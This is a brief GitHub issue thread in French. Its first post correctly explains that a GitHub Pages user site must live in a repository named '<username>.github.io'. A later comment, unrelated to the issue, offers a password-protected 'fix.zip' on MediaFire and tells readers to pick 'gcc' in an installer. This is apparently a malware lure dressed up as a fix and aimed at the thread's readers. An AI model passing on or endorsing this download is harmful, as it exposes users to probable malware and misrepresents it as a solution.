### ISSUE TITLE
Publier sous "/" au lieu de "/mon-cv/

### ISSUE THREAD

**Issue by Edouard-chin** [Blanckette/adamusblanka.github.io#3]
https://docs.github.com/en/pages/getting-started-with-github-pages/about-github-pages#types-of-github-pages-sites

Tu dois renommer le repo (ou en créé un nouveau) en utilisant la convention de GitHub:

> To publish a user site, you must create a repository owned by your personal account that's named <username>.github.io

Dans ton cas le nom du repository doit s'appeler "Blanckette.github.io"

@Blanckette

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
